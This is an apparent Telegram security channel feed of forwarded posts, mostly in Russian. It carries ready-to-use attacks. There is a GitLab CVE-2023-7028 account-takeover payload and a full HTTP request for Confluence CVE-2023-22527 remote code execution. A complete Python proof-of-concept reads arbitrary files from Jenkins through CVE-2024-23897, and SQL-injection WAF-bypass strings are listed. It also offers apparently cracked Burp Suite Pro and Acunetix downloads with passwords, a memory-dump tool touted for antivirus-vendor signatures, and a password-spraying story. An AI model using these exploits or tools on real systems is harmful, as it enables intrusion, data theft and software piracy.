Forwarded from C.I.T. Security
burpsuite_pro_v2023.12.1.1.zip
685 MB
Burp Suite Professional v2023.12.1.1 + BurpBounty_Pro 2.7.0 + JDK 18
NOTE -
@zer0daylab #pentest #security
NOTE -
Run this version With Java SE JDK 18
Released Wednesday, 10 January 2024@zer0daylab #pentest #security
👨💻1
Forwarded from Кавычка (Bo0oM)
#gitlab
Забавная логическая уязвимость в Gitlab - CVE-2023-7028
Можно переопределить почту в механизме восстановления пароля, передав специально сформированный запрос, в котором в нулевом элементе массива будет валидный email, а в следующем - злоумышленника.
PoC:
Для проверки фактов компрометации систем предлагается оценить в логе
Проблема проявляется начиная с выпуска GitLab 16.1.0, в котором появилась возможность отправки кода восстановления пароля на неверифицированный запасной email-адрес.
>
Забавная логическая уязвимость в Gitlab - CVE-2023-7028
Можно переопределить почту в механизме восстановления пароля, передав специально сформированный запрос, в котором в нулевом элементе массива будет валидный email, а в следующем - злоумышленника.
PoC:
user[email][]=valid@email.com&user[email][]=attacker@email.comДля проверки фактов компрометации систем предлагается оценить в логе
gitlab-rails/production_json.log наличие HTTP-запросов к обработчику /users/password с указанием массива из нескольких email в параметре "`params.value.email`". Также предлагается проверить наличие в логе gitlab-rails/audit_json.log записей со значением PasswordsController#create в meta.caller.id и указанием массива из нескольких адресов в блоке target_details. Атака не может быть доведена до конца при включении пользователем двухфакторной аутентификации.Проблема проявляется начиная с выпуска GitLab 16.1.0, в котором появилась возможность отправки кода восстановления пароля на неверифицированный запасной email-адрес.
>
👨💻1
Forwarded from Offensive Xwitter
😈 [ Vozec @Vozec1 ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
❤1
Forwarded from true_security
kldumper.exe
4 MB
утилиты для дампа памяти процесса. с подписью антивирусов avg,avast,kaspersky
❤3
Forwarded from Юрий Строжевский
Выложил свой код для получения Windows Extended Rights на GitHub: https://github.com/YuryStrozhevsky/extendedRights
GitHub
GitHub - YuryStrozhevsky/extendedRights: How to retrive all information about Windows Extended Rights via LDAP
How to retrive all information about Windows Extended Rights via LDAP - YuryStrozhevsky/extendedRights
❤1
Forwarded from The Bug Bounty Hunter
Web LLM attacks
Organizations are rushing to integrate Large Language Models (LLMs) in order to improve their online customer experience.
https://portswigger.net/web-security/llm-attacks
Organizations are rushing to integrate Large Language Models (LLMs) in order to improve their online customer experience.
https://portswigger.net/web-security/llm-attacks
portswigger.net
Web LLM attacks | Web Security Academy
Organizations are rushing to integrate Large Language Models (LLMs) in order to improve their online customer experience. This exposes them to web LLM ...
❤1
Forwarded from SecuriXy.kz
#CVE-2023-22527 #RCE (Remote Code Execution) Vulnerability In #Confluence Data Center and Confluence Server with #CVSS v3: 10/10
Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.
Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.
Note: 7.19.x LTS versions are not affected by this vulnerability
Product
Confluence Data Center and Server
Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3
https://www.opencve.io/cve/CVE-2023-22527
https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
PoC: https://github.com/Avento/CVE-2023-22527_Confluence_RCE
Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.
Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.
Note: 7.19.x LTS versions are not affected by this vulnerability
Product
Confluence Data Center and Server
Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3
https://www.opencve.io/cve/CVE-2023-22527
https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
PoC: https://github.com/Avento/CVE-2023-22527_Confluence_RCE
🫡2❤1
Forwarded from Pwn3rzs
Acunetix Windows v24.1 - 11 Jan 2024
Download:
Too long for a post, refer here:
Enjoy!
Download:
https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.1.240111130-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs
Changelog:Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v24-1-11-january-2024/
Enjoy!
💅2❤1
Forwarded from RedTeam brazzers (Pavel Shlundin)
Недавно на пентесте столкнулся с ситуацией, когда надо поспреить пользователей, а на руках есть вывод Ldapdomaindump. Вроде кажется, что задача простая, но есть нюансы:
1. В домене около 30к пользователей;
2. Большинство пользователей отключены, т.к. уволенных сотрудников не удаляют из домена;
3. В группе Protected Users около 600 пользователей (да, бывает и такое);
4. 8к пользователей используют smart-cards им пароли нет смысла спреить;
5. И самое жёсткое - это наличие большого количества сервисных учетных записей, к которым применяется FGPP (гранулированная парольная политика), которая при вводе хотя бы 1 неправильного пароля - блокирует учетную запись (Немного спорное решение, пишите в комментарии как к нему относитесь).
Таким образом, если заранее не подготовить список пользователей, то как минимум можно нарваться на долгий спрей по 30к пользователям, а как максимум залочить все сервисные учетные записи, которые не используют GMSA.
Под этот проект я накидал небольшой скрипт на питоне, который позволил отсеять 70% учетных записей и сократить список пользователей для спрея до 7800. После этого спрей дал результаты. В приложении скрипт (прошу не судить строго).
1. В домене около 30к пользователей;
2. Большинство пользователей отключены, т.к. уволенных сотрудников не удаляют из домена;
3. В группе Protected Users около 600 пользователей (да, бывает и такое);
4. 8к пользователей используют smart-cards им пароли нет смысла спреить;
5. И самое жёсткое - это наличие большого количества сервисных учетных записей, к которым применяется FGPP (гранулированная парольная политика), которая при вводе хотя бы 1 неправильного пароля - блокирует учетную запись (Немного спорное решение, пишите в комментарии как к нему относитесь).
Таким образом, если заранее не подготовить список пользователей, то как минимум можно нарваться на долгий спрей по 30к пользователям, а как максимум залочить все сервисные учетные записи, которые не используют GMSA.
Под этот проект я накидал небольшой скрипт на питоне, который позволил отсеять 70% учетных записей и сократить список пользователей для спрея до 7800. После этого спрей дал результаты. В приложении скрипт (прошу не судить строго).
Docs
Advanced AD DS Management Using Active Directory Administrative Center (Level 200)
Learn more about Advanced AD DS Management using Active Directory Administrative Center (Level 200).
Forwarded from RedTeam brazzers (Pavel Shlundin)
parse_domain_users
1.1 KB
Forwarded from Интернет-Розыск
Список бесплатных ChatGPT-ботов для программирования
▫️https://www.blackbox.ai/
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://www.blackbox.ai/
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
🤝2
Forwarded from PurpleBear (Vadim Shelest)
Детали уязвимости CVE-2023-22527 (оценка по CVSS3.0=10), позволяющей получить RCE в
Согласно даннымскомпрометированных торчащих в интернет серверов
⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3
#confluence #CVE-2023-22527
Atlassian Confluence известны уже пару дней, но не все почему-то спешат обновлять свои сервера. 🤷♂️Согласно данным
Censys, которые обновляются ежедневно в отношении всего пространства IPv4, в нашей стране на сегодняшний день~3.6k Confluence. Технические детали уязвимости опубликованы в блоге ProjectDiscovery, эксплуатация позволяет не аутентифицированному злоумышленнику получить возможность исполнения произвольного кода путем SSTI инъекции OGNL (Object-Graph Navigation Language)POST /template/aui/text-inline.vm HTTP/1.1
Host: сonfluence:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3
#confluence #CVE-2023-22527
ProjectDiscovery
Atlassian Confluence - Remote Code Execution (CVE-2023-22527) — ProjectDiscovery Blog
CVE-2023-22527 is a critical vulnerability within Atlassian's Confluence Server and Data Center. This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution…
❤1
Forwarded from burpsuite (not official)
burpsuite_pro_v2023.12.1.2.zip
686 MB
pass: 311138
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.7.0
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.7.0
❤1
Forwarded from The Hacker News
🚨 Urgent: Critical Jenkins RCE vulnerability (CVE-2024-23897) discovered.
Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.
Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.
Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
🫡2❤1
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
Forwarded from SHADOW:Group
💉 Про обход защиты от SQL-инъекций
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не даетнормально воткнуть кавычку и вставить привычный пэйлоад, однако, нехитрыми манипуляциями все же частенько его можно обойти.
Например, добавив управляющие символы , типа
Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не дает
Например, добавив управляющие символы , типа
%00, %0A и др. или вставив математические операции ('AND'1'=1*1 вместо 'AND'1'='1') или добавив специфичные комментарии типа /*!50000%55nIoN*/ /*!50000%53eLeCt*/ и многое другое.Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
